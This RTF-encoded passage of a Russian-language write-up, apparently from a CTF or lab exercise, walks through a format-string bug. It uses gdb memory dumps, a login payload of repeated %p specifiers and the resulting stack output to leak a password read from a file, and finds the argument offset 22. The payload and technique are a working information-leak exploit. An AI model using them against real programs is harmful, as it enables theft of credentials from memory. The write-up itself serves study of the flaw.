\uc0\u1055 \u1086 \u1089 \u1083 \u1077  fopen \u1074 \u1099 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090 \u1089 \u1103  read, \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1089 \u1095 \u1080 \u1090 \u1072 \u1077 \u1090  \u1086 \u1090 \u1082 \u1088 \u1099 \u1090 \u1099 \u1081  \u1088 \u1072 \u1085 \u1077 \u1077  \u1092 \u1072 \u1081 \u1083  \u1080  \u1079 \u1072 \u1087 \u1080 \u1096 \u1077 \u1090  \u1074  \u1089 \u1090 \u1077 \u1082 \
\
\uc0\u1044 \u1072 \u1083 \u1077 \u1077  \u1087 \u1088 \u1086 \u1080 \u1089 \u1093 \u1086 \u1076 \u1103 \u1090  2 \u1074 \u1099 \u1079 \u1086 \u1074 \u1072  fgets, \u1086 \u1076 \u1080 \u1085  \u1080 \u1079  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1093  \u1079 \u1072 \u1087 \u1088 \u1072 \u1096 \u1080 \u1074 \u1072 \u1077 \u1090  \u1091  \u1087 \u1086 \u1083 \u1100 \u1079 \u1086 \u1074 \u1072 \u1090 \u1077 \u1083 \u1103  \u1083 \u1086 \u1075 \u1080 \u1085 , \
\uc0\u1055 \u1086 \u1089 \u1083 \u1077  \u1095 \u1077 \u1075 \u1086  \u1086 \u1085  \u1079 \u1072 \u1087 \u1080 \u1096 \u1077 \u1090 \u1089 \u1103  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091  (\u1072 \u1076 \u1088 \u1077 \u1089 , \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1085 \u1072 \u1093 \u1086 \u1076 \u1080 \u1090 \u1089 \u1103  \u1074  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1077  rax \u1087 \u1077 \u1088 \u1077 \u1076  \u1074 \u1099 \u1079 \u1086 \u1074 \u1086 \u1084  \u1092 \u1091 \u1085 \u1082 \u1094 \u1080 \u1080 ):\
\
(gdb) x 0x7fffffffe510\
0x7fffffffe510:	 "AAAAAAAA"\
\
\uc0\u1042 \u1090 \u1086 \u1088 \u1086 \u1081  \u1074 \u1099 \u1079 \u1086 \u1074  fgets \u1079 \u1072 \u1087 \u1088 \u1072 \u1096 \u1080 \u1072 \u1077 \u1090  \u1087 \u1072 \u1088 \u1086 \u1083 \u1100  \u1080  \u1089 \u1086 \u1093 \u1088 \u1072 \u1085 \u1103 \u1077 \u1090  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091 :\
(gdb) x 0x7fffffffe470\
0x7fffffffe470:	 "BBBBBBBB\\n"\
\
\uc0\u1052 \u1086 \u1078 \u1085 \u1086  \u1079 \u1072 \u1084 \u1077 \u1090 \u1080 \u1090 \u1100 , \u1095 \u1090 \u1086  \u1074  \u1089 \u1090 \u1077 \u1082 \u1077  \u1084 \u1077 \u1078 \u1076 \u1091  \u1072 \u1076 \u1088 \u1077 \u1089 \u1086 \u1084 , \u1075 \u1076 \u1077  \u1083 \u1077 \u1078 \u1080 \u1090  \u1083 \u1086 \u1075 \u1080 \u1085  \u1080  \u1075 \u1076 \u1077  \u1083 \u1077 \u1078 \u1080 \u1090  \u1074 \u1074 \u1077 \u1076 \u1077 \u1085 \u1085 \u1099 \u1081  \u1087 \u1072 \u1088 \u1086 \u1083 \u1100 , \u1085 \u1072 \u1093 \u1086 \u1076 \u1080 \u1090 \u1089 \u1103  \u1089 \u1095 \u1080 \u1090 \u1072 \u1085 \u1085 \u1099 \u1081  \u1087 \u1072 \u1088 \u1086 \u1083 \u1100  \u1080 \u1079  \u1092 \u1072 \u1081 \u1083 \u1072  \
(gdb) x/1000s 0x7fffffffe470\
0x7fffffffe470:	 "BBBBBBBB\\n"\
0x7fffffffe47a:	 ""\
\'85\
\'85\
0x7fffffffe4df:	 ""\

\f1\b \cb13 0x7fffffffe4e0:	 'A' <repeats 40 times>
\f2\b0 \cb1 \
0x7fffffffe509:	 ""\
0x7fffffffe50a:	 ""\
0x7fffffffe50b:	 ""\
0x7fffffffe50c:	 ""\
0x7fffffffe50d:	 ""\
0x7fffffffe50e:	 ""\
0x7fffffffe50f:	 ""\
0x7fffffffe510:	 "AAAAAAAA"\
\
\uc0\u1063 \u1090 \u1086 \u1073 \u1099  \u1077 \u1075 \u1086  \u1088 \u1072 \u1089 \u1087 \u1077 \u1095 \u1072 \u1090 \u1072 \u1090 \u1100  \u1084 \u1086 \u1078 \u1085 \u1086  \u1074 \u1086 \u1089 \u1087 \u1086 \u1083 \u1100 \u1079 \u1086 \u1074 \u1072 \u1090 \u1100 \u1089 \u1103  \u1091 \u1103 \u1079 \u1074 \u1080 \u1084 \u1086 \u1089 \u1090 \u1100 \u1102  \u1092 \u1086 \u1088 \u1084 \u1072 \u1090 \u1085 \u1086 \u1081  \u1089 \u1090 \u1088 \u1086 \u1082 \u1080 , \
\uc0\u1090 \u1072 \u1082  \u1082 \u1072 \u1082  \u1076 \u1072 \u1083 \u1077 \u1077  \u1087 \u1088 \u1086 \u1080 \u1089 \u1093 \u1086 \u1076 \u1080 \u1090  \u1074 \u1099 \u1079 \u1086 \u1074  printf, \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1074 \u1099 \u1074 \u1077 \u1076 \u1077 \u1090  \u1083 \u1086 \u1075 \u1080 \u1085 . \
\
\uc0\u1055 \u1086 \u1076 \u1072 \u1074 \u1072 \u1103  \u1085 \u1091 \u1078 \u1085 \u1086 \u1077  \u1082 \u1086 \u1083 -\u1074 \u1086  \u1089 \u1087 \u1077 \u1094 \u1080 \u1092 \u1080 \u1082 \u1072 \u1090 \u1086 \u1088 \u1086 \u1074  %p \u1084 \u1086 \u1078 \u1085 \u1086  \u1085 \u1072 \u1095 \u1072 \u1090 \u1100  \u1074 \u1099 \u1074 \u1086 \u1076 \u1080 \u1090 \u1100  \u1076 \u1072 \u1085 \u1085 \u1099 \u1077  \u1080 \u1079  \u1089 \u1090 \u1077 \u1082 \u1072 , \u1074  \u1090 \u1086 \u1084  \u1095 \u1080 \u1089 \u1083 \u1077  \u1087 \u1072 \u1088 \u1086 \u1083 \u1100  \u1080 \u1079  \u1092 \u1072 \u1081 \u1083 \u1072 .\
\
\uc0\u1042  \u1076 \u1077 \u1073 \u1072 \u1075 \u1077 \u1088 \u1077  \u1087 \u1088 \u1086 \u1073 \u1091 \u1077 \u1084  \u1087 \u1086 \u1076 \u1072 \u1090 \u1100  \u1083 \u1086 \u1075 \u1080 \u1085  40 %p, \u1095 \u1090 \u1086 \u1073 \u1099  \u1086 \u1087 \u1088 \u1077 \u1076 \u1077 \u1083 \u1080 \u1090 \u1100  \u1089 \u1084 \u1077 \u1097 \u1077 \u1085 \u1080 \u1077 :\
\
CCCCCCCC%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%                    \
\
\uc0\u1042  \u1080 \u1090 \u1086 \u1075 \u1077  \u1087 \u1086 \u1083 \u1091 \u1095 \u1072 \u1077 \u1084  \u1089 \u1090 \u1088 \u1086 \u1082 \u1091 :\
\
--[ Password: *****************************************\
CCCCCCCC0x7fffffffe470(nil)0x200x2a2a2a2a2a2a2a2a0x2a2a2a2a2a2a2a2a0x7fffffffe6680x3f7ff9a080x20202020202020200x2020(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)0x100000000(nil)0x41414141414141410x41414141414141410x41414141414141410x41414141414141410x4141414141414141(nil)0x43434343434343430x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x20202020202020250x2900202020 does not have access!\
\
\uc0\u1063 \u1090 \u1086  \u1087 \u1086 \u1079 \u1074 \u1086 \u1083 \u1103 \u1077 \u1090  \u1086 \u1087 \u1088 \u1077 \u1076 \u1077 \u1083 \u1080 \u1090 \u1100  \u1089  \u1082 \u1072 \u1082 \u1086 \u1075 \u1086  \u1072 \u1088 \u1075 \u1091 \u1084 \u1077 \u1085 \u1090 \u1072  \u1085 \u1091 \u1078 \u1085 \u1086  \u1074 \u1099 \u1074 \u1086 \u1076 \u1080 \u1090 \u1100  - 22.\
\
\pard\tx720\pardeftab720\qj\partightenfactor0

\f1\b \cf10 \
\pard\tx720\pardeftab720\qj\partightenfactor0

\f2\b0 \cf2 \
\
\
\
\
\
\
\
\
\pard\tx720\pardeftab720\qj\partightenfactor0

\f1\b \cf10 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0

\f2\b0 \cf2 \
}